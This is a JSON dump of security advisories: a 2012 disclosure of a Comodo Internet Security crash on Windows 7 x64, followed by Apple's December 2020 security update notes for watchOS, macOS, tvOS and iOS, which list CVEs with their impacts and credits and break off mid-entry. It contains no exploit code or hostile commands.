{"id": "SECURITYVULNS:DOC:27944", "bulletinFamily": "software", "title": "[CVE-2012-2273] Comodo Internet Security <5.10 BSOD (Win7 x64)", "description": "[affected software]\r\nComodo Internet Security, until 5.9\r\n\r\n[description]\r\nBSOD under Windows 7 x64 if a 32b PE with a kernel ImageBase is executed.\r\n\r\nsuch files are very unusual, but work perfectly if the PE contains\r\nrelocations, as shown at http://pe.corkami.com#ImageBase and\r\nhttp://pe.corkami.com#relocations\r\n\r\nPoCs downloadable on http://pe.corkami.com, files: tls_reloc ibkernel\r\nibkmanual reloccrypt\r\n\r\n[author]\r\nAnge Albertini (corkami.com)\r\n\r\n[vendor communication]\r\n5th January 2012 - details shared with the vendor\r\n23th January 2012 - patch is planned\r\n12th March 2012 - bug are fixed in 5.10\r\n\r\nfrom http://www.comodo.com/home/download/release-notes.php?p=anti-malware\r\n\r\n5.10.228257.2253: 12 March, 2012\r\n * IMPROVED! Compatibility with other security suites is improved in\r\nWindows 7 x64\r\n * FIXED! BSOD when corrupted executables are loaded in memory in Windows 7 x64\r\n * FIXED! HIPS can leak process handles with a special set of access rights\r\n * FIXED! Smart scan crashes under certain circumstances\r\n\r\n[mitigation]\r\nupdate to 5.10 or later\r\n", "published": "2012-04-22T00:00:00", "modified": "2012-04-22T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27944", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:44", "edition": 1, "viewCount": 2, "enchantments": {"score": {"value": 3.2, "vector": "NONE", "modified": "2018-08-31T11:10:44", "rev": 2}, "dependencies": {"references": [{"type": "nessus", "idList": ["EULEROS_SA-2020-1318.NASL", "EULEROS_SA-2020-1323.NASL", "EULEROS_SA-2020-1314.NASL", "DEBIAN_DLA-2164.NASL", "FREEBSD_PKG_40194E1C6D8911EA808280EE73419AF3.NASL", "EULEROS_SA-2020-1299.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562311220201314", "OPENVAS:1361412562311220201299", "OPENVAS:1361412562311220201256", "OPENVAS:1361412562311220201323", "OPENVAS:1361412562311220201196", "OPENVAS:1361412562311220201318", "OPENVAS:1361412562310892164"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2164-1:52F3C"]}, {"type": "zdt", "idList": ["1337DAY-ID-34153", "1337DAY-ID-34134"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:10149"]}, {"type": "kitploit", "idList": ["KITPLOIT:1907207623071471216"]}, {"type": "mssecure", "idList": ["MSSECURE:057ED5C1C386380F0F149DBAC7F1F6EF"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156729"]}], "modified": "2018-08-31T11:10:44", "rev": 2}, "vulnersScore": 3.2}, "affectedSoftware": []}

{"apple": [{"lastseen": "2020-12-24T20:42:05", "bulletinFamily": "software", "cvelist": ["CVE-2020-27943", "CVE-2020-15969", "CVE-2020-29617", "CVE-2020-27944", "CVE-2020-29619", "CVE-2020-29611", "CVE-2020-27951", "CVE-2020-29624", "CVE-2020-27946", "CVE-2020-29618", "CVE-2020-27948"], "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n\n\n## watchOS 7.2\n\nReleased December 14, 2020\n\n**CoreAudio**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2020-27948: JunDong Xie of Ant Security Light-Year Lab\n\n**FontParser**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An information disclosure issue was addressed with improved state management.\n\nCVE-2020-27946: Mateusz Jurczyk of Google Project Zero\n\n**FontParser**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the processing of font files. This issue was addressed with improved input validation.\n\nCVE-2020-27943: Mateusz Jurczyk of Google Project Zero\n\nCVE-2020-27944: Mateusz Jurczyk of Google Project Zero\n\nCVE-2020-29624: Mateusz Jurczyk of Google Project Zero\n\nEntry updated December 22, 2020\n\n**ImageIO**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: Processing a maliciously crafted image may lead to heap corruption\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2020-29617: XingWei Lin of Ant Security Light-Year Lab\n\nCVE-2020-29619: XingWei Lin of Ant Security Light-Year Lab\n\n**ImageIO**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2020-29618: XingWei Lin of Ant Security Light-Year Lab\n\n**ImageIO**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2020-29611: Alexandru-Vlad Niculae working with Google Project Zero\n\nEntry updated December 17, 2020\n\n**Security**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: Unauthorized code execution may lead to an authentication policy violation\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2020-27951: Apple\n\n**WebRTC**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2020-15969: an anonymous researcher\n", "edition": 4, "modified": "2020-12-22T05:59:49", "published": "2020-12-22T05:59:49", "id": "APPLE:HT212009", "href": "https://support.apple.com/kb/HT212009", "title": "About the security content of watchOS 7.2 - Apple Support", "type": "apple", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-24T20:43:19", "bulletinFamily": "software", "cvelist": ["CVE-2020-27926", "CVE-2020-27943", "CVE-2020-29612", "CVE-2020-27931", "CVE-2020-9974", "CVE-2020-27898", "CVE-2020-29620", "CVE-2020-15969", "CVE-2020-29617", "CVE-2020-27923", "CVE-2020-27944", "CVE-2020-9967", "CVE-2020-29616", "CVE-2020-27949", "CVE-2020-10004", "CVE-2020-27896", "CVE-2020-27903", "CVE-2020-27912", "CVE-2020-27941", "CVE-2020-27897", "CVE-2020-27901", "CVE-2020-10010", "CVE-2020-10009", "CVE-2020-27919", "CVE-2020-10007", "CVE-2020-10015", "CVE-2020-29619", "CVE-2020-10012", "CVE-2020-27906", "CVE-2020-9962", "CVE-2020-9943", "CVE-2020-27924", "CVE-2020-9978", "CVE-2020-27939", "CVE-2020-27907", "CVE-2020-27915", "CVE-2020-10002", "CVE-2020-9956", "CVE-2020-29611", "CVE-2020-27908", "CVE-2020-27921", "CVE-2020-9960", "CVE-2020-10016", "CVE-2020-29621", "CVE-2020-9944", "CVE-2020-27952", "CVE-2020-27947", "CVE-2020-27920", "CVE-2020-27911", "CVE-2020-13524", "CVE-2020-10014", "CVE-2020-27910", "CVE-2020-9975", "CVE-2020-10017", "CVE-2020-27914", "CVE-2020-29624", "CVE-2020-27946", "CVE-2020-29618", "CVE-2020-27916", "CVE-2020-27948", "CVE-2020-27922"], "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n\n\n## macOS Big Sur 11.1, Security Update 2020-001 Catalina, Security Update 2020-007 Mojave\n\nReleased December 14, 2020\n\n**AMD**\n\nAvailable for: macOS Mojave 10.14.6, macOS Catalina 10.15.7\n\nImpact: A malicious application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2020-27914: Yu Wang of Didi Research America\n\nCVE-2020-27915: Yu Wang of Didi Research America\n\n**App Store**\n\nAvailable for: macOS Mojave 10.14.6, macOS Catalina 10.15.7\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: This issue was addressed by removing the vulnerable code.\n\nCVE-2020-27903: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab\n\n**AppleGraphicsControl**\n\nAvailable for: macOS Mojave 10.14.6, macOS Catalina 10.15.7, macOS Big Sur 11.0.1\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A validation issue was addressed with improved logic.\n\nCVE-2020-27941: shrek_wzw\n\n**AppleMobileFileIntegrity**\n\nAvailable for: macOS Big Sur 11.0.1\n\nImpact: A malicious application may be able to bypass Privacy preferences\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2020-29621: Wojciech Regu\u0142a (@_r3ggi) of SecuRing\n\n**Audio**\n\nAvailable for: macOS Mojave 10.14.6, macOS Catalina 10.15.7\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2020-27910: JunDong Xie and XingWei Lin of Ant Security Light-Year Lab\n\n**Audio**\n\nAvailable for: macOS Mojave 10.14.6, macOS Catalina 10.15.7\n\nImpact: A malicious application may be able to read restricted memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2020-9943: JunDong Xie of Ant Security Light-Year Lab\n\n**Audio**\n\nAvailable for: macOS Mojave 10.14.6, macOS Catalina 10.15.7\n\nImpact: An application may be able to read restricted memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2020-9944: JunDong Xie of Ant Security Light-Year Lab\n\n**Audio**\n\nAvailable for: macOS Mojave 10.14.6, macOS Catalina 10.15.7\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: An out-of-bounds write was addressed with improved input validation.\n\nCVE-2020-27916: JunDong Xie of Ant Security Light-Year Lab\n\n**Bluetooth**\n\nAvailable for: macOS Mojave 10.14.6, macOS Catalina 10.15.7\n\nImpact: A remote attacker may be able to cause unexpected application termination or heap corruption\n\nDescription: Multiple integer overflows were addressed with improved input validation.\n\nCVE-2020-27906: Zuozhi Fan (@pattern_F_) of Ant Group Tianqiong Security Lab\n\n**CoreAudio**\n\nAvailable for: macOS Mojave 10.14.6, macOS Catalina 10.15.7, macOS Big Sur 11.0.1\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2020-27948: JunDong Xie of Ant Security Light-Year Lab\n\n**CoreAudio**\n\nAvailable for: macOS Mojave 10.14.6, macOS Catalina 10.15.7\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2020-9960: JunDong Xie and XingWei Lin of Ant Security Light-Year Lab\n\nCVE-2020-27908: JunDong Xie and XingWei Lin of Ant Security Light-Year Lab\n\n**CoreAudio**\n\nAvailable for: macOS Mojave 10.14.6, macOS Catalina 10.15.7\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: An out-of-bounds write was addressed with improved input validation.\n\nCVE-2020-10017: Francis working with Trend Micro Zero Day Initiative, JunDong Xie of Ant Security Light-Year Lab\n\n**CoreText**\n\nAvailable for: macOS Mojave 10.14.6, macOS Catalina 10.15.7\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2020-27922: Mickey Jin of Trend Micro\n\n**FontParser**\n\nAvailable for: macOS Big Sur 11.0.1\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An information disclosure issue was addressed with improved state management.\n\nCVE-2020-27946: Mateusz Jurczyk of Google Project Zero\n\n**FontParser**\n\nAvailable for: macOS Mojave 10.14.6, macOS Catalina 10.15.7\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: A buffer overflow was addressed with improved size validation.\n\nCVE-2020-9962: Yi\u011fit Can YILMAZ (@yilmazcanyigit)\n\n**FontParser**\n\nAvailable for: macOS Mojave 10.14.6, macOS Catalina 10.15.7\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: An out-of-bounds write was addressed with improved input validation.\n\nCVE-2020-27952: an anonymous researcher, Mickey Jin and Junzhi Lu of Trend Micro\n\n**FontParser**\n\nAvailable for: macOS Mojave 10.14.6, macOS Catalina 10.15.7\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2020-9956: Mickey Jin and Junzhi Lu of Trend Micro Mobile Security Research Team working with Trend Micro\u2019s Zero Day Initiative\n\n**FontParser**\n\nAvailable for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Big Sur 11.0.1\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the processing of font files. This issue was addressed with improved input validation.\n\nCVE-2020-27931: Apple\n\nCVE-2020-27943: Mateusz Jurczyk of Google Project Zero\n\nCVE-2020-27944: Mateusz Jurczyk of Google Project Zero\n\nCVE-2020-29624: Mateusz Jurczyk of Google Project Zero\n\nEntry updated December 22, 2020\n\n**Foundation**\n\nAvailable for: macOS Mojave 10.14.6, macOS Catalina 10.15.7\n\nImpact: A local user may be able to read arbitrary files\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2020-10002: James Hutchins\n\n**Graphics Drivers**\n\nAvailable for: macOS Mojave 10.14.6, macOS Catalina 10.15.7, macOS Big Sur 11.0.1\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2020-27947: ABC Research s.r.o. working with Trend Micro Zero Day Initiative\n\n**Graphics Drivers**\n\nAvailable for: macOS Mojave 10.14.6, macOS Catalina 10.15.7, macOS Big Sur 11.0.1\n\nImpact: A malicious application may be able to execute arbitrary code with system privileges\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2020-29612: ABC Research s.r.o. working with Trend Micro Zero Day Initiative\n\n**HomeKit**\n\nAvailable for: macOS Mojave 10.14.6, macOS Catalina 10.15.7\n\nImpact: An attacker in a privileged network position may be able to unexpectedly alter application state\n\nDescription: This issue was addressed with improved setting propagation.\n\nCVE-2020-9978: Luyi Xing, Dongfang Zhao, and Xiaofeng Wang of Indiana University Bloomington, Yan Jia of Xidian University and University of Chinese Academy of Sciences, and Bin Yuan of HuaZhong University of Science and Technology\n\n**ImageIO**\n\nAvailable for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2020-27939: Xingwei Lin of Ant Security Light-Year Lab\n\nEntry added December 22, 2020\n\n**ImageIO**\n\nAvailable for: macOS Big Sur 11.0.1\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2020-29616: zhouat working with Trend Micro Zero Day Initiative\n\n**ImageIO**\n\nAvailable for: macOS Mojave 10.14.6, macOS Catalina 10.15.7, macOS Big Sur 11.0.1\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2020-27924: Lei Sun\n\nCVE-2020-29618: XingWei Lin of Ant Security Light-Year Lab\n\n**ImageIO**\n\nAvailable for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Big Sur 11.0.1\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2020-29611: Alexandru-Vlad Niculae working with Google Project Zero\n\nEntry updated December 17, 2020\n\n**ImageIO**\n\nAvailable for: macOS Mojave 10.14.6, macOS Catalina 10.15.7, macOS Big Sur 11.0.1\n\nImpact: Processing a maliciously crafted image may lead to heap corruption\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2020-29617: XingWei Lin of Ant Security Light-Year Lab\n\nCVE-2020-29619: XingWei Lin of Ant Security Light-Year Lab\n\n**ImageIO**\n\nAvailable for: macOS Mojave 10.14.6, macOS Catalina 10.15.7\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds write was addressed with improved input validation.\n\nCVE-2020-27912: Xingwei Lin of Ant Security Light-Year Lab\n\nCVE-2020-27923: Lei Sun\n\n**Image Processing**\n\nAvailable for: macOS Mojave 10.14.6, macOS Catalina 10.15.7\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds write was addressed with improved input validation.\n\nCVE-2020-27919: Hou JingYi (@hjy79425575) of Qihoo 360 CERT, Xingwei Lin of Ant Security Light-Year Lab\n\n**Intel Graphics Driver**\n\nAvailable for: macOS Mojave 10.14.6, macOS Catalina 10.15.7\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2020-10015: ABC Research s.r.o. working with Trend Micro Zero Day Initiative\n\nCVE-2020-27897: Xiaolong Bai and Min (Spark) Zheng of Alibaba Inc. and Luyi Xing of Indiana University Bloomington\n\n**Intel Graphics Driver**\n\nAvailable for: macOS Mojave 10.14.6, macOS Catalina 10.15.7\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2020-27907: ABC Research s.r.o. working with Trend Micro Zero Day Initiative\n\n**Kernel**\n\nAvailable for: macOS Mojave 10.14.6, macOS Catalina 10.15.7\n\nImpact: A malicious application may be able to determine kernel memory layout\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2020-9974: Tommy Muir (@Muirey03)\n\n**Kernel**\n\nAvailable for: macOS Mojave 10.14.6, macOS Catalina 10.15.7\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2020-10016: Alex Helie\n\n**Kernel**\n\nAvailable for: macOS Mojave 10.14.6, macOS Catalina 10.15.7\n\nImpact: A remote attacker may be able to cause unexpected system termination or corrupt kernel memory\n\nDescription: Multiple memory corruption issues were addressed with improved input validation.\n\nCVE-2020-9967: Alex Plaskett (@alexjplaskett)\n\n**Kernel**\n\nAvailable for: macOS Mojave 10.14.6, macOS Catalina 10.15.7\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2020-9975: Tielei Wang of Pangu Lab\n\n**Kernel**\n\nAvailable for: macOS Mojave 10.14.6, macOS Catalina 10.15.7\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A race condition was addressed with improved state handling.\n\nCVE-2020-27921: Linus Henze (pinauten.de)\n\n**Kernel**\n\nAvailable for: macOS Mojave 10.14.6, macOS Catalina 10.15.7, macOS Big Sur 11.0.1\n\nImpact: A malicious application may cause unexpected changes in memory belonging to processes traced by DTrace\n\nDescription: This issue was addressed with improved checks to prevent unauthorized actions.\n\nCVE-2020-27949: Steffen Klee (@_kleest) of TU Darmstadt, Secure Mobile Networking Lab\n\n**Kernel**\n\nAvailable for: macOS Big Sur 11.0.1\n\nImpact: A malicious application may be able to elevate privileges\n\nDescription: This issue was addressed with improved entitlements.\n\nCVE-2020-29620: Csaba Fitzl (@theevilbit) of Offensive Security\n\n**libxml2**\n\nAvailable for: macOS Mojave 10.14.6, macOS Catalina 10.15.7\n\nImpact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution\n\nDescription: An integer overflow was addressed through improved input validation.\n\nCVE-2020-27911: found by OSS-Fuzz\n\n**libxml2**\n\nAvailable for: macOS Mojave 10.14.6, macOS Catalina 10.15.7\n\nImpact: Processing maliciously crafted web content may lead to code execution\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2020-27920: found by OSS-Fuzz\n\n**libxml2**\n\nAvailable for: macOS Mojave 10.14.6, macOS Catalina 10.15.7\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2020-27926: found by OSS-Fuzz\n\n**libxpc**\n\nAvailable for: macOS Mojave 10.14.6, macOS Catalina 10.15.7\n\nImpact: A malicious application may be able to break out of its sandbox\n\nDescription: A parsing issue in the handling of directory paths was addressed with improved path validation.\n\nCVE-2020-10014: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab\n\n**Logging**\n\nAvailable for: macOS Mojave 10.14.6, macOS Catalina 10.15.7\n\nImpact: A local attacker may be able to elevate their privileges\n\nDescription: A path handling issue was addressed with improved validation.\n\nCVE-2020-10010: Tommy Muir (@Muirey03)\n\n**Model I/O**\n\nAvailable for: macOS Mojave 10.14.6, macOS Catalina 10.15.7\n\nImpact: Processing a maliciously crafted USD file may lead to unexpected application termination or arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2020-13524: Aleksandar Nikolic of Cisco Talos\n\n**Model I/O**\n\nAvailable for: macOS Mojave 10.14.6, macOS Catalina 10.15.7\n\nImpact: Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2020-10004: Aleksandar Nikolic of Cisco Talos\n\n**NSRemoteView**\n\nAvailable for: macOS Mojave 10.14.6, macOS Catalina 10.15.7\n\nImpact: A sandboxed process may be able to circumvent sandbox restrictions\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2020-27901: Thijs Alkemade of Computest Research Division\n\n**Power Management**\n\nAvailable for: macOS Mojave 10.14.6, macOS Catalina 10.15.7\n\nImpact: A malicious application may be able to determine kernel memory layout\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2020-10007: singi@theori working with Trend Micro Zero Day Initiative\n\n**Quick Look**\n\nAvailable for: macOS Mojave 10.14.6, macOS Catalina 10.15.7\n\nImpact: Processing a maliciously crafted document may lead to a cross site scripting attack\n\nDescription: An access issue was addressed with improved access restrictions.\n\nCVE-2020-10012: Heige of KnownSec 404 Team (knownsec.com) and Bo Qu of Palo Alto Networks (paloaltonetworks.com)\n\n**Ruby**\n\nAvailable for: macOS Mojave 10.14.6, macOS Catalina 10.15.7\n\nImpact: A remote attacker may be able to modify the file system\n\nDescription: A path handling issue was addressed with improved validation.\n\nCVE-2020-27896: an anonymous researcher\n\n**System Preferences**\n\nAvailable for: macOS Mojave 10.14.6, macOS Catalina 10.15.7\n\nImpact: A sandboxed process may be able to circumvent sandbox restrictions\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2020-10009: Thijs Alkemade of Computest Research Division\n\n**WebRTC**\n\nAvailable for: macOS Big Sur 11.0.1\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2020-15969: an anonymous researcher\n\n**Wi-Fi**\n\nAvailable for: macOS Mojave 10.14.6, macOS Catalina 10.15.7\n\nImpact: An attacker may be able to bypass Managed Frame Protection\n\nDescription: A denial of service issue was addressed with improved state handling.\n\nCVE-2020-27898: Stephan Marais of University of Johannesburg\n", "edition": 4, "modified": "2020-12-22T05:58:28", "published": "2020-12-22T05:58:28", "id": "APPLE:HT212011", "href": "https://support.apple.com/kb/HT212011", "title": "About the security content of macOS Big Sur 11.1, Security Update 2020-001 Catalina, Security Update 2020-007 Mojave - Apple Support", "type": "apple", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:42:25", "bulletinFamily": "software", "cvelist": ["CVE-2020-27943", "CVE-2020-15969", "CVE-2020-29617", "CVE-2020-27944", "CVE-2020-29619", "CVE-2020-29611", "CVE-2020-29624", "CVE-2020-27946", "CVE-2020-29618", "CVE-2020-27948"], "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n\n\n## tvOS 14.3\n\nReleased December 14, 2020\n\n**CoreAudio**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2020-27948: JunDong Xie of Ant Security Light-Year Lab\n\n**FontParser**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An information disclosure issue was addressed with improved state management.\n\nCVE-2020-27946: Mateusz Jurczyk of Google Project Zero\n\n**FontParser**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the processing of font files. This issue was addressed with improved input validation.\n\nCVE-2020-27943: Mateusz Jurczyk of Google Project Zero\n\nCVE-2020-27944: Mateusz Jurczyk of Google Project Zero\n\nCVE-2020-29624: Mateusz Jurczyk of Google Project Zero\n\nEntry updated December 22, 2020\n\n**ImageIO**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing a maliciously crafted image may lead to heap corruption\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2020-29617: XingWei Lin of Ant Security Light-Year Lab\n\nCVE-2020-29619: XingWei Lin of Ant Security Light-Year Lab\n\n**ImageIO**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2020-29618: XingWei Lin of Ant Security Light-Year Lab\n\n**ImageIO**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2020-29611: Alexandru-Vlad Niculae working with Google Project Zero\n\nEntry updated December 17, 2020\n\n**WebRTC**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2020-15969: an anonymous researcher\n", "edition": 4, "modified": "2020-12-22T05:55:59", "published": "2020-12-22T05:55:59", "id": "APPLE:HT212005", "href": "https://support.apple.com/kb/HT212005", "title": "About the security content of tvOS 14.3 - Apple Support", "type": "apple", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-24T20:41:16", "bulletinFamily": "software", "cvelist": ["CVE-2020-27943", "CVE-2020-15969", "CVE-2020-29617", "CVE-2020-27944", "CVE-2020-29619", "CVE-2020-29611", "CVE-2020-29613", "CVE-2020-27951", "CVE-2020-29624", "CVE-2020-27946", "CVE-2020-29618", "CVE-2020-27948"], "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n\n\n## iOS 14.3 and iPadOS 14.3\n\nReleased December 14, 2020\n\n**App Store**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: An enterprise application installation prompt may display the wrong domain\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2020-29613: Ryan Pickren (ryanpickren.com)\n\n**CoreAudio**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2020-27948: JunDong Xie of Ant Security Light-Year Lab\n\n**FontParser**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An information disclosure issue was addressed with improved state management.\n\nCVE-2020-27946: Mateusz Jurczyk of Google Project Zero\n\n**FontParser**\n\nAvailable for: iPhone 6s and later, iPod touch 7th generation, iPad Air 2 and later, and iPad mini 4 and later\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the processing of font files. This issue was addressed with improved input validation.\n\nCVE-2020-27943: Mateusz Jurczyk of Google Project Zero\n\nCVE-2020-27944: Mateusz Jurczyk of Google Project Zero\n\nCVE-2020-29624: Mateusz Jurczyk of Google Project Zero\n\nEntry updated December 22, 2020\n\n**ImageIO**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: Processing a maliciously crafted image may lead to heap corruption\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2020-29617: XingWei 